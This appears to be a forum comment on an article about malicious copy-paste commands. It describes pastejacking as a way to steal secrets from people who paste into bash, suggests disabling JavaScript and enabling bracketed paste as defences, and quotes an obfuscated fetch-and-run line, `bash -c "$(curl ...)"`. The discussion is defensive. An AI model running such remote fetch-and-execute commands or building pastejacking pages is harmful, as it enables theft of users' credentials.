That wouldn't really help, it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because as far as i know by default bash doesn't use bracketed paste, so you think you're copying a real command and it ends up sending your secrets before you know what happened.

Disabling JS + bracketed paste seems to be the only good solution.

Btw OP article uses a weird setup, why would they use `bash -c "$(curl $(echo qux | base64))"` instead of just "curl | bash"